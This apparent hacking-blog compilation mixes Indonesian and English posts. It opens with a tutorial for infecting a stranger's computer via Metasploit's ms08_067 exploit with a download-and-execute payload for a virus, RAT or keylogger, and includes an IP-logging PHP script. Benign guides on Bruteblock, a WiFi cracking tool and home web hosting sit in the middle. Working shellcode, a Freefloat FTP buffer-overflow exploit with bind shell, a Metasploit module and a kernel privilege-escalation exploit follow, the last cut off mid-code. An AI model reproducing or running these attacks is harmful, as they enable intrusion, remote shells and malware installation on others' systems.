waduh baru kaku juga tangan ne ga nulis...sekarang bakal update lagi ne o2nri2nya,,,ok lanjut...
ni tutorial ngebahas tentang gimana cara nya kita nginfect ip seseorang lewat metasploit jadi dengan gitu kita memasang program , virus,worm,RAT,keylogger atau apa aja terserah anda,
ok lanjut
di sini kita membutuhkan dua tool yg mungkin kalian semua udah pada g asing lagi lah ama tool ini
yaitu
METASPLOIT
NMAP
hal yg paling pertama kita lakukan tentu saja mencari target
yah kalo target nya dalam jaringan lokal kalian bisa menggunakan berbagai tool ip scanner kan itu sih gampang, ,,
nah kalo pngen tau ip orang di internet gimana ?
nih cuman ngasih pencerahan dikit
kita bkin dlu suatu script php untuk menangkap ip adress dari pengunjung yg membuka script itu
nih script nya
<? $file = "ip.txt"; $ip = $_SERVER['REMOTE_ADDR']; $handle = fopen($file, 'a'); fwrite($handle, "IP Address: "); fwrite($handle, "$ip"); fwrite($handle, "\n"); fclose($handle); ?>
ok lanjut kalo dah dapet ip kita lanjut buka metasploit
1. sebelum nya kita harus membuat dulu database dengan cara
ketik db_create pada metasploit
2. lalu kta scan ip target menggunakan nmap dengan cara ketik nmap pada metasploit lalu ketik nmap -sT -sV target ip
telah scanning beres nanti kita akan mendapatkan beberapa informasi, bila di dalam nya ada informasi berkaitan dengan windows 2000,(xp sp1,sp2,sp3) berarti kita bisa menginfect ip tersebut tanpa masalah
3. dalam metasploit ketik use windows/smb/ms08_067_netapi
lalu ketik 'set target 0'
'show payloads'
'set payload windows/download_exec'
show options
set RHOST target IP
nah setelah itu disini bagian terpenting nya program apa yg ingin kita infect ke ip(komputer) tersebut.
apa kah kita akan menginfeksikan suatu virus,worm,RAT,keylogger,atau apa saja terserah anda
kita ketik set url http://www.site.com/xxx.exe
dan akhir nya kita ketik exploit
Serangan bruteforce ke service ssh dan ftp memang bikin gondok. Hasil iseng ngebrowse membawa gw ketemu tools yang menarik dan lumayan mudah penggunaannya
Bruteblock membuat sistem administrator untuk ngebloking serangan bruteforce yang mengarah ke service UNIX .
How this tools work ?
Dengan menganalisa sistem log kemudian menambahkan alamat IP penyerang ke ipfw2 tabel, tool ini dapat memblokir brute attacker.
Kemudian alamat IP secara otomatis akan didelete dari tabel tadi setelah kurun waktu tertentu yang udah ditetapin. Bruteblock juga memakai ekspresi reguler untuk parse log, yang memberikan fleksibilitas dalam mengoperasikannya. Sehingga tool ini bisa digunakan untuk hampir semua service jaringan.
How to install ? Just simple…follow this step
1. install melalui port :
#cd /usr/ports/security/bruteblock
#make install clean
2. Tambahkan baris berikut di /etc/rc.conf agar bruteblock bisa langsung running sewaktu boot
bruteblockd_enable=”YES”
bruteblockd_table=”1″
bruteblockd_flags=”-s 5″
3. Edit file /etc/syslog.conf
Ubah baris berikut :
auth.info;authpriv.info /var/log/auth.log
menjadi
auth.info;authpriv.info |exec /usr/local/sbin/bruteblock -f /usr/local/etc/bruteblock/ssh.conf
4. Restart Syslogd
#/etc/rc.d/syslogd restart
5. start aplikasi bruteblock dengan command :
#/usr/local/etc/rc.d/bruteblockd.sh start
6. Tambain setting di ipfw untuk memblock IP-IP yang di masukkan oleh bruteblock
#ipfw add 400 deny ip from me to table\(1\)
#ipfw add 410 deny ip from table\(1\) to me
7. kalo ente mau ngerubah setting bruteblock untuk setiap service yang dilindungi, misal gw kepengen ngubah setting untuk ssh di file /usr/local/etc/bruteblock/ssh.conf
perhatikan beberapa point – point di bawah ini
regexp = sshd.*Illegal user \S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
regexp1 = sshd.*Failed password for (?:illegal user )?\S+ from (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})
# Number of failed login attempts within time before we block
max_count = 4
# Time in seconds in which all failed login attempts must occur
within_time = 60
# Time in seconds to block ip in firewall
# 10 minutes
reset_ip = 600# IPFW table number to add “bad” hosts
ipfw2_table_no = 1
lo bisa aja menerapkan untuk service yang lain , contohnya ftp. kita hanya perlu mengubah di bagianregexp.tinggal di disesuaikan aja dengan format log servicenya.
gampang kan ?…
di tunggu commentnya di mari ..
DOWNLOAD
http://zeestuff.wordpress.com/2010/11/06/tangkis-serangan-bruteforce-pada-freebsd-unix/#more-74
source : tecon-crew
Wireless security auditing application
This is a wireless security auditing application that is written in python and uses python-qt4. This application uses the aircrack-ng suite of tools.
It should work on any version of linux running the following:
Requirements:
python
python-qt4
macchanger
aircrack-ng
xterm
For Slax Distributions, download the zipped module package on the download section, and follow the instructions in the "README" file.
To install simply run the following command in terminal after changing directory to the path were the downloaded package is:
dpkg -i Fern-Wifi-Cracker_1.1_all.deb
Software Icon can be found at the application Menu of the GNOME desktop interfaces
Icon can also be found at /usr/share/applications for KDE and also GNOME:
There you find "Fern_Wifi_Cracker.desktop"
Images:
Click the refresh button to display monitor interfaces:
Decrypted keys are automatically added to the database after a successful attack.. but you could also add the keys manually
The database file could be found at /usr/local/bin/Fern-Wifi-Cracker/key-Database/Database.db
NOTE: Its normal for your VGA screen to adjust and return while application is initializing.. this is because the software has to adjust to a suitable resolution before running... If not the text on the application overlaps or certain text becomes invisible
everyone..welcome back with me...marvellous a.k.a Liyan oz
Probably some may be already knowing this ,but many dont... so this tutorial is for the second lot of the people ie for those who don't know how to use their own personal desktop machine to host an website which can be accessed from anywhere round the world.
Been using it since around a month now and thought y not share it over here ;) ..
I learnt this method from a friend who has nothing to do with HF and have made the complete tutorials myself which took me hell lot of a time.. and so no part of this tutorial has been leeched from anyone and noone can say thats its theirs just because they use this method themself ... .. cos 10000 of people round the globe are using it. Am just trying to help the newbies and if i make any kind of error dont flame me
Requirements:
To start off u'll just require a PC with windows loaded in it. Pretty much works on all windows version :) ..
Nothing more would be required :D
Step 1 :
Goto DynDNS. Click on Sign In.
It should look something like this:
http://img203.imageshack.us/img203/1637/89403494.png
<hr>
Step 2 :
Then Click on Create an Account. You should be redirected to the registration page which looks like this:
http://img263.imageshack.us/img263/572/18892149.png
Fill in all the necessary details as required.After filling the page would look somethin like this:
http://img135.imageshack.us/img135/5926/46115337.png
Then click on Create Account and you should be redirected to page showing that account is created which looks like this :
http://img41.imageshack.us/img41/7326/92990336.png
<hr>
Step 3 :
Goto the email id which you provided during the registration. In my case the email went to the spam box .
Open the email and goto the mail from dyndns.
It looks something like this
http://img8.imageshack.us/img8/3893/66820418.png
Click on the confirmation link. On clicking it you would be redirected to dydns site where it asks for password confirmation. Enter your password which you entered during registration and you will be shown a page that states account activated.
http://img28.imageshack.us/img28/6110/28900678.png
http://img828.imageshack.us/img828/388/97742084.png
<hr>
Step 4 :
Click on Add Hostname.
This takes you to next page.
Enter any hostname of your choice and enter your current machine's Ip adress in the specified slot.
After filling it should look something like this :
http://img153.imageshack.us/img153/6231/75921400.png
Now click on Add to cart at the bottom of the page.
This take you to a page : http://img135.imageshack.us/img135/2263/63344696.png
Click Next
It takes you to a price summary page which looks like
http://img189.imageshack.us/img189/5227/30244360.png
Click Activate services on the page which take you to this page:
http://img715.imageshack.us/img715/6793/28850505.png
<hr>
Step 5 :
Now click on support on the top of the page and then on update client on the left hand side.
This takes you to this page: http://img715.imageshack.us/img715/3523/78946032.png
Now download the DyDNS Updater on to you local machine.
http://img840.imageshack.us/img840/7889/46189333.png
<hr>
Step 6 :
Now time for Installation
When you open the installer file it looks something like this: -------image 16
Go on Clicking Next ... http://img812.imageshack.us/img812/3707/63194612.png
When installation ends, you get this: http://img222.imageshack.us/img222/4535/82718638.png
Click Finish.
When it opens, you see this : http://img263.imageshack.us/img263/5320/18043052.png
Select the DNS host which we created sometime back and Click Apply and then Click Ok .
On clicking Ok... you can see this : http://img401.imageshack.us/img401/2807/54145072.png
Coool... so ur Ip is in sync with the hostname
<hr>
Step 7 :
Now my machine does not have Apache server installed.. so i'll goto http://httpd.apache.org
The page looks something like this: http://img256.imageshack.us/img256/6906/18788668.png
Now click on "from a mirror" link on the left hand side. This takes you to the downloads section which looks like :
http://img827.imageshack.us/img827/7315/45156565.png
Now you can either choose the latest version available or the most stable version thats available in the downloads section.
I'll choose the most stable version ie 2.2.17.
So, click on the Win32 Binary including OpenSSL and download it .
<hr>
Step 8 :
Then, launch the Apache Installation. The main screen when you open download is as : http://img222.imageshack.us/img222/547/92653498.png
When you click on next you get a screen like :http://img189.imageshack.us/img189/1231/42707644.png which asks you for some details.
The details have to be filled in the way last tym we had enterd for dyndns. Enter your email id for admin email id.
The filled details will look like this : http://img404.imageshack.us/img404/9084/34613609.png
Click next . Then you get this screen http://img148.imageshack.us/img148/3688/76736775.png.
Click Finish.
At this point i want to say somethin .. your DONEE doing all the required settings. Yipee
<hr>
Step 9 :
Now, to test whether what all the settings are proper and we can view our local website on the WWW , we open our browser and enter the host adress of the dyndns which we setup earlier.
Its looks something like this.
http://img525.imageshack.us/img525/8392/91348770.png
And it sayss.... It works !! .... woww....
Means we are done setting up our website using our local PC and this website can be viewed fro any place round the world .
LolZZ.. and for the others who feel that this is fake and am just viewing it cos its hosted on my local machine and am accessing it by localhost, lets use any online proxy site and visit the link to see if we can view the website.
I choose our own.. hidemyass.com ... The homepage looks like this :http://img151.imageshack.us/img151/2456/66840544.png
When i open the pre specified URL in the online proxy , the site is visited via an IP diffrent from ours ie similar to a way a diffrent machine may view the URL .. and what we see is ... http://img528.imageshack.us/img528/6531/48179935.png ... meanss... OUR HARD WORK PAYED OFF AND OUR WEBSITE IS HOSTED ONLINE AND THAT TOO FREE O COST FOR UNLIMITED PERIOD OF TIME
<hr>
Step 10 :
To others who are new to this and don't know, where to put the files so at host the website, put your own "index" page and the other files at the location : C:\Program Files\Apache Software Foundation\Apache2.2\htdocs ... just replace the index file and you can view the new site which you will be uploading. The place you upload your new index file and the other files looks like this.. http://img822.imageshack.us/img822/4714/66616122.png
<hr>
<hr>
It took me lott of time to create this tutorial specially to setup the whole thing again and take screenshots of the whole thing. So, Haters pleaseee :hi:stay off ...
Hope this tutorial was helpful for u'll ... Kindly comment and let me know whether you like it or not.
==========================================
OSX/Intel - setuid shell x86_64 - 51 bytes
==========================================
/*
* Title: OSX/Intel - setuid shell x86_64 - 51 bytes
* Date: 2010-11-25
* Tested on: Mac OS X 10.6.5 - Darwin Kernel Version 10.5.0
* Author: Dustin Schultz - twitter: @thexploit
*
* http://thexploit.com
*
* BITS 64
*
* section .text
* global start
*
* start:
* a:
* mov r8b, 0x02 ; Unix class system calls = 2
* shl r8, 24 ; shift left 24 to the upper order bits
* or r8, 0x17 ; setuid = 23, or with class = 0x2000017
* xor edi, edi ; zero out edi
* mov rax, r8 ; syscall number in rax
* syscall ; invoke kernel
* jmp short c ; jump to c
* b:
* pop rdi ; pop ret addr which = addr of /bin/sh
* add r8, 0x24 ; execve = 59, 0x24+r8=0x200003b
* mov rax, r8 ; syscall number in rax
* xor rdx, rdx ; zero out rdx
* push rdx ; null terminate rdi, pushed backwards
* push rdi ; push rdi = pointer to /bin/sh
* mov rsi, rsp ; pointer to null terminated /bin/sh string
* syscall ; invoke the kernel
* c:
* call b ; call b, push ret of /bin/sh
* db '/bin//sh' ; /bin/sh string
*/
#include <stdio.h>
#include <sys/mman.h>
#include <string.h>
#include <stdlib.h>
int (*sc)();
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\xeb\x12\x5f\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x52"
"\x57\x48\x89\xe6\x0f\x05\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x2f\x73\x68";
int main(int argc, char **argv) {
void *ptr = mmap(0, 0x33, PROT_EXEC | PROT_WRITE | PROT_READ, MAP_ANON
| MAP_PRIVATE, -1, 0);
if (ptr == MAP_FAILED) {
perror("mmap");
exit(-1);
}
memcpy(ptr, shellcode, sizeof(shellcode));
sc = ptr;
sc();
return 0;
}
# oz==============================================
linux/ARM - Bind Connect UDP Port 68 Shellcode
==============================================
/*
* Title: arm-bind-connect-udp
* Brief: Bind to port 68 on any local address and plug a udp shell
* onto to port 67 on 192.168.0.1
* Author: Daniel Godas-Lopez <gmail account dgodas>
*/
.if 1
/*
close(3), close(4), ..., close(1024)
*/
mov %r1, $1024
1: mov %r0, %r1
svc 0x00900006
subs %r1, %r1, $1
subs %r2, %r1, $3
bpl 1b
.endif
/*
soc_des = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
*/
mov %r0, $2 /* AF_INET */
mov %r1, $2 /* SOCK_DGRAM */
mov %r2, $17 /* IPPRTOTO_UDP */
push {%r0, %r1, %r2}
mov %r0, $1 /* socket */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $12
mov %r6, %r0 /* r6 = soc_des */
/*
bind(soc_des, (struct sockaddr*) &serv_addr, sizeof(serv_addr));
*/
.if 0 /* r0 == r6 already */
mov %r0, %r6 /* soc_des */
.endif
mov %r1, $0x44000000
add %r1, $2 /* port = 68, family = 2 (AF_INET) */
sub %r2, %r2, %r2 /* addr = 0.0.0.0 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $2 /* bind */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
connect(soc_des, (struct sockaddr*) &cli_addr, sizeof(cli_addr));
*/
mov %r0, %r6 /* soc_des */
mov %r1, $0x43000000
add %r1, $2 /* port = 67, family = 2 (AF_INET) */
mov %r2, $0x1000000
add %r2, %r2, $0xa800
add %r2, $0xc0 /* addr = 192.168.0.1 */
push {%r1, %r2}
mov %r1, %sp /* pointer to sockaddr_in */
mov %r2, $16 /* sizeof(struct sockaddr_in) */
push {%r0, %r1, %r2}
mov %r0, $3 /* connect */
mov %r1, %sp
svc 0x00900066
add %sp, %sp, $20
/*
dup2(soc_cli,0);
dup2(soc_cli,1);
dup2(soc_cli,2);
*/
mov %r1, $2
1: mov %r0, %r6
svc 0x0090003f
subs %r1, %r1, $1
bpl 1b
/*
execve("/bin/sh", parms, env);
*/
sub %r1, %sp, $4 /* argv[0] = "sh" */
sub %r2, %r2, %r2 /* argv[1] = 0x00000000 */
mov %r3, $0x2f
mov %r7, $0x62
add %r3, %r7, lsl $8
mov %r7, $0x69
add %r3, %r7, lsl $16
mov %r7, $0x6e
add %r3, %r7, lsl $24 /* '/' 'b' 'i' 'n' */
mov %r4, $'/'
mov %r7, $'s'
add %r4, %r7, lsl $8
mov %r7, $'h'
add %r4, %r7, lsl $16 /* '/' 's' 'h' 0x00 */
mov %r5, $'s'
mov %r7, $'h'
add %r5, %r7, lsl $8 /* 's' 'h' 0x00 0x00 */
push {%r1, %r2, %r3, %r4, %r5}
add %r0, %sp, $8 /* filename ptr */
add %r1, %sp, $0 /* argv ptr */
add %r2, %sp, $4 /* env ptr */
svc 0x0090000b
# oz=======================================================
Freefloat FTP Server Buffer Overflow Vulnerability 0day
=======================================================
# Exploit Title: Freefloat FTP Server Buffer Overflow Vulnerability
# Date: 12/05/2010
# Author: 0v3r
# Software Link: http://www.freefloat.com/software/freefloatftpserver.zip
# Tested on: Windows XP SP3 EN
# CVE: N/A
#!/usr/bin/python
import socket
import sys
def usage():
print "usage : ./freefloatftp.py <victim_ip> <victim_port>"
print "example: ./freefloatftp.py 192.168.1.100 21"
#Bind Shell shellcode port 4444
shellcode = ("\x31\xc9\xdb\xcd\xbb\xb3\x93\x96\x9d\xb1\x56\xd9\x74\x24\xf4"
"\x5a\x31\x5a\x17\x83\xea\xfc\x03\x5a\x13\x51\x66\x6a\x75\x1c"
"\x89\x93\x86\x7e\x03\x76\xb7\xac\x77\xf2\xea\x60\xf3\x56\x07"
"\x0b\x51\x43\x9c\x79\x7e\x64\x15\x37\x58\x4b\xa6\xf6\x64\x07"
"\x64\x99\x18\x5a\xb9\x79\x20\x95\xcc\x78\x65\xc8\x3f\x28\x3e"
"\x86\x92\xdc\x4b\xda\x2e\xdd\x9b\x50\x0e\xa5\x9e\xa7\xfb\x1f"
"\xa0\xf7\x54\x14\xea\xef\xdf\x72\xcb\x0e\x33\x61\x37\x58\x38"
"\x51\xc3\x5b\xe8\xa8\x2c\x6a\xd4\x66\x13\x42\xd9\x77\x53\x65"
"\x02\x02\xaf\x95\xbf\x14\x74\xe7\x1b\x91\x69\x4f\xef\x01\x4a"
"\x71\x3c\xd7\x19\x7d\x89\x9c\x46\x62\x0c\x71\xfd\x9e\x85\x74"
"\xd2\x16\xdd\x52\xf6\x73\x85\xfb\xaf\xd9\x68\x04\xaf\x86\xd5"
"\xa0\xbb\x25\x01\xd2\xe1\x21\xe6\xe8\x19\xb2\x60\x7b\x69\x80"
"\x2f\xd7\xe5\xa8\xb8\xf1\xf2\xcf\x92\x45\x6c\x2e\x1d\xb5\xa4"
"\xf5\x49\xe5\xde\xdc\xf1\x6e\x1f\xe0\x27\x20\x4f\x4e\x98\x80"
"\x3f\x2e\x48\x68\x2a\xa1\xb7\x88\x55\x6b\xce\x8f\x9b\x4f\x82"
"\x67\xde\x6f\x34\x2b\x57\x89\x5c\xc3\x31\x01\xc9\x21\x66\x9a"
"\x6e\x5a\x4c\xb6\x27\xcc\xd8\xd0\xf0\xf3\xd8\xf6\x52\x58\x70"
"\x91\x20\xb2\x45\x80\x36\x9f\xed\xcb\x0e\x77\x67\xa2\xdd\xe6"
"\x78\xef\xb6\x8b\xeb\x74\x47\xc2\x17\x23\x10\x83\xe6\x3a\xf4"
"\x39\x50\x95\xeb\xc0\x04\xde\xa8\x1e\xf5\xe1\x31\xd3\x41\xc6"
"\x21\x2d\x49\x42\x16\xe1\x1c\x1c\xc0\x47\xf7\xee\xba\x11\xa4"
"\xb8\x2a\xe4\x86\x7a\x2d\xe9\xc2\x0c\xd1\x5b\xbb\x48\xed\x53"
"\x2b\x5d\x96\x8e\xcb\xa2\x4d\x0b\xfb\xe8\xcc\x3d\x94\xb4\x84"
"\x7c\xf9\x46\x73\x42\x04\xc5\x76\x3a\xf3\xd5\xf2\x3f\xbf\x51"
"\xee\x4d\xd0\x37\x10\xe2\xd1\x1d\x1a")
junk1 = "\x41" * 230
eip = "\x53\x93\x42\x7E" #7E429353 JMP ESP
nops = "\x90" * 16
junk2 = "\x43" * (1000 - len(junk1 + eip + nops + shellcode))
buff = junk1 + eip + nops + shellcode + junk2
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print "\n"
print "----------------------------------------------------------------"
print "| Freefloat FTP Server Buffer Overflow Vulnerability |"
print "----------------------------------------------------------------"
print "\n"
if len(sys.argv) != 3:
usage()
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
try:
print("[-] Connecting to " + ip + " on port " + port + "\n")
s.connect((ip,int(port)))
data = s.recv(1024)
print("[-] Sending exploit...")
s.send('USER ' + buff + '\r\n')
s.close()
print("[-] Exploit successfully sent...")
print("[-] Connect to " + ip + " on port 4444")
except:
print("[-] Connection error...")
print("[-] Check if victim is up.")
===================================================
Freefloat FTP Server Buffer Overflow Exploit (Meta)
===================================================
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Ftp
def initialize(info = {})
super(update_info(info,
'Name' => 'Freefloat FTP <= 1.00 Stack Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability in Freefloat FTP service version 1.00.
This module uses the USER command to trigger the overflow.
},
'Author' =>
[
'0v3r', # original version
'Muhamad Fadzil Ramli' # metasploit module
],
'License' => MSF_LICENSE,
'Version' => '$Revision: $',
'References' =>
[
[ 'EDB', '15689' ],
[ 'URL', 'http://www.freefloat.com/software/freefloatftpserver.zip' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
'RPORT' => 21
},
'Privileged' => false,
'Payload' =>
{
'Space' => 512,
'BadChars' => "\x00\x0a\x0d\xff\x20",
'StackAdjustment' => -3500,
'DisableNops' => true
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP3 (EN)', { 'Ret' => 0x5AD86AEB } ], # push esp, ret [uxtheme.dll]
],
'DisclosureDate' => 'December 5 2010',
'DefaultTarget' => 0))
deregister_options('FTPUSER','FTPPASS')
end
def check
connect
disconnect
if (banner =~ /FreeFloat Ftp Server \(Version 1\.00\)/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
connect
print_status("Trying target #{target.name}...")
buf = rand_text_alpha(230)
buf << [target.ret].pack('V')
buf << make_nops(16)
buf << payload.encoded
#buf << rand_text_alpha(1000 - buf.length)
#send_cmd( ['USER',buf],false )
send_user(buf)
handler
disconnect
end
end====================================================================
ViRobot Desktop 5.5 and Server 3.5 <=2008.8.1.1 Privilege Escalation
====================================================================
VULNERABLE PRODUCTS
Hauri ViRobot Desktop 5.5 and below
Hauri ViRobot Server 3.5 and below
DETAILS:
VRsecos.sys create a device called "VRsecos" , and handles DeviceIoControl Code = 0x8307202c , which use the function "strcpy" to copy memory from irp systembuffer to driver's data area , can be overwrite critical kernel object memory in vrsecos.sys ' s data area
EXPLOIT CODE: (Test On Windows XP SP3 , only for vrsecos.sys == 2008.8.1.1)
\
// virobot0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
#include "malloc.h"
typedef struct X_DISPATCHER_HEADER{
UCHAR Type ;
UCHAR Absolute ;
UCHAR Size ;
UCHAR Inserted ;
ULONG SignalState ;
LIST_ENTRY WaitListHead ;
}X_DISPATCHER_HEADER , *PX_DISPATCHER_HEADER;
typedef struct X_KMUTANT{
X_DISPATCHER_HEADER Header ;
LIST_ENTRY MutantListEntry ;
PVOID OwnerThread ;
UCHAR Abandoned ;
UCHAR ApcDisable ;
}X_KMUTANT , *PX_KMUTANT;
PVOID GetInfoTable(ULONG ATableType)
{
ULONG mSize = 0x4000;
PVOID mPtr = NULL;
LONG status;
HMODULE hlib = GetModuleHandle("ntdll.dll");
PVOID pZwQuerySystemInformation = GetProcAddress(hlib , "ZwQuerySystemInformation");
do
{
mPtr = malloc(mSize);
if (mPtr)
{
__asm
{
push 0
push mSize
push mPtr
push ATableType
call pZwQuerySystemInformation
mov status , eax
}
}
else
{
return NULL;
}
if (status == 0xc0000004)
{
free(mPtr);
mSize = mSize * 2;
}
} while (status == 0xc0000004);
if (status == 0)
{
return mPtr;
}
free(mPtr);
return NULL;
}
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO {
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, *PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
typedef struct _SYSTEM_HANDLE_INFORMATION {
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Information[ 1 ];
} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
USHORT Index;
USHORT NameLength;
USHORT LoadCount;
USHORT PathLength;
CHAR ImageName[256];
} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
typedef struct {
ULONG Count;
SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
typedef VOID (WINAPI *PINBV_ACQUIRE_DISPLAY_OWNERSHIP)(VOID);
typedef BOOLEAN (WINAPI *PINBV_RESET_DISPLAY)(VOID);
typedef VOID (WINAPI *PINBV_SOLID_COLOR_FILL)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2,
ULONG color
);
typedef ULONG (WINAPI *PINBV_SET_TEXT_COLOR)(
ULONG Color
);
typedef
VOID
(*INBV_DISPLAY_STRING_FILTER)(
PUCHAR *Str
);
typedef VOID (WINAPI *PINBV_INSTALL_DISPLAY_STRING_FILTER)(
INBV_DISPLAY_STRING_FILTER DisplayStringFilter
);
typedef BOOLEAN (WINAPI *PINBV_ENABLE_DISPLAY_STRING)(
BOOLEAN bEnable
);
typedef VOID (WINAPI *PINVB_SET_SCROLL_REGION)(
ULONG x1,
ULONG y1,
ULONG x2,
ULONG y2
);
typedef VOID (WINAPI *PINBV_DISPLAY_STRING)(
PUCHAR Str
);
PINBV_ACQUIRE_DISPLAY_OWNERSHIP InbvAcquireDisplayOwnership = 0 ;
PINBV_RESET_DISPLAY InbvResetDisplay = 0 ;
PINBV_SOLID_COLOR_FILL InbvSolidColorFill = 0 ;
PINBV_SET_TEXT_COLOR InbvSetTextColor = 0 ;
PINBV_INSTALL_DISPLAY_STRING_FILTER InbvInstallDisplayStringFilter = 0 ;
PINBV_ENABLE_DISPLAY_STRING InbvEnableDisplayString = 0 ;
PINVB_SET_SCROLL_REGION InbvSetScrollRegion = 0 ;
PINBV_DISPLAY_STRING InbvDisplayString= 0 ;
#define VGA_COLOR_BLACK 0
#define VGA_COLOR_RED 1
#define VGA_COLOR_GREEN 2
#define VGA_COLOR_GR 3
#define VGA_COLOR_BULE 4
#define VGA_COLOR_DARK_MEGAENTA 5
#define VGA_COLOR_TURQUOISE 6
#define VGA_COLOR_GRAY 7
#define VGA_COLOR_BRIGHT_GRAY 8
#define VGA_COLOR_BRIGHT_RED 9
#define VGA_COLOR_BRIGHT_GREEN 10
#define VGA_COLOR_BRIGHT_YELLOW 11
#define VGA_COLOR_BRIGHT_BULE 12
#define VGA_COLOR_BRIGHT_PURPLE 13
#define VGA_COLOR_BRIGHT_TURQUOISE 14
#define VGA_COLOR_WHITE 15
UCHAR DisplayString[] =
" "
" "
" "
" ---- ===== EXPLOIT SUCCESSFULLY ==== ---- "
" "
" "
" ViRobot Desktop 5.5 & ViRobot Server 3.5 Local Privilege Escalation Exploit "
" "
" VULNERABLE PRODUCT "
" "
" ViRobot Desktop 5.5 and below "
" ViRobot Server 3.5 and below "
" "
" VULERABLE FILE "
" VRsecos.sys <= 2008.8.1.1 "
" "
" AUTHOR "
" "
" MJ0011 "
" th_decoder$126.com "
" "
" 2010-8-22 "
" "
" "
" ";
VOID InbvShellCode()
{
//DISABLE INTERRUPT
__asm
{
cli
}
//RESET TO VGA MODE
InbvAcquireDisplayOwnership();
InbvResetDisplay();
//FILL FULL SCREEN
InbvSolidColorFill(0 , 0 , 639 , 479 ,VGA_COLOR_BLACK);
//SET TEXT COLOR
InbvSetTextColor(VGA_COLOR_BRIGHT_GREEN);
InbvInstallDisplayStringFilter(NULL);
InbvEnableDisplayString(TRUE);
InbvSetScrollRegion( 0 , 0 , 639 ,477);
InbvDisplayString(DisplayString);
while(TRUE)
{
};
}
BOOL InbvInit(PVOID ntosbase , PSTR ntosname)
{
HMODULE hlib = LoadLibrary(ntosname);
if (hlib == NULL)
{
return FALSE ;
}
InbvAcquireDisplayOwnership = (PINBV_ACQUIRE_DISPLAY_OWNERSHIP)((ULONG)GetProcAddress(hlib , "InbvAcquireDisplayOwnership") - (ULONG)hlib + (ULONG)ntosbase);
InbvResetDisplay = (PINBV_RESET_DISPLAY)((ULONG)GetProcAddress(hlib , "InbvResetDisplay") - (ULONG)hlib + (ULONG)ntosbase);
InbvSolidColorFill = (PINBV_SOLID_COLOR_FILL)((ULONG)GetProcAddress(hlib , "InbvSolidColorFill") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetTextColor = (PINBV_SET_TEXT_COLOR)((ULONG)GetProcAddress(hlib , "InbvSetTextColor") - (ULONG)hlib + (ULONG)ntosbase);
InbvInstallDisplayStringFilter = (PINBV_INSTALL_DISPLAY_STRING_FILTER)((ULONG)GetProcAddress(hlib , "InbvInstallDisplayStringFilter") - (ULONG)hlib + (ULONG)ntosbase);
InbvEnableDisplayString = (PINBV_ENABLE_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvEnableDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
InbvSetScrollRegion = (PINVB_SET_SCROLL_REGION)((ULONG)GetProcAddress(hlib , "InbvSetScrollRegion") - (ULONG)hlib + (ULONG)ntosbase);
InbvDisplayString = (PINBV_DISPLAY_STRING)((ULONG)GetProcAddress(hlib , "InbvDisplayString") - (ULONG)hlib + (ULONG)ntosbase);
if (InbvAcquireDisplayOwnership &&
InbvResetDisplay &&
InbvSolidColorFill &&
InbvSetTextColor &&
InbvInstallDisplayStringFilter &&
InbvEnableDisplayString &&
InbvSetScrollRegion &&
InbvDisplayString)
{
return TRUE ;
}
return FALSE ;
}
int main(int argc, char* argv[])
{
printf("ViRotbot Desktop 5.5 & ViRobot Server 3.5 vrsecos.sys <= 2008.8.1.1\n"
"Local Kernel Mode Privilege Escalation Vulnerability POC\n\n"
"This Exploit Code Only for vrsecos == 2008.8.1.1\n"
"Test On Windows XP SP3\n\n"
"By MJ0011 th_decoder$126.com\n\n"
"Press Enter\n");
getchar();
HANDLE hDev = CreateFile("\\\\.\\VRsecos" , FILE_READ_ATTRIBUTES , FILE_SHARE_READ , 0 , OPEN_EXISTING , 0 , 0 );
if (hDev == INVALID_HANDLE_VALUE)
{
printf("cannot open device....%u\n" , GetLastError());
//return 0;
}
//data for IoControlCode = 8307202C , buffer overrun
PVOID pdata = malloc(0x2000);
//fill non-zero data
memset(pdata , 0x20 , 0x2000);
//process mutx ...
PX_KMUTANT pmutant = (PX_KMUTANT)((ULONG)pdata + 0x858 + 200);
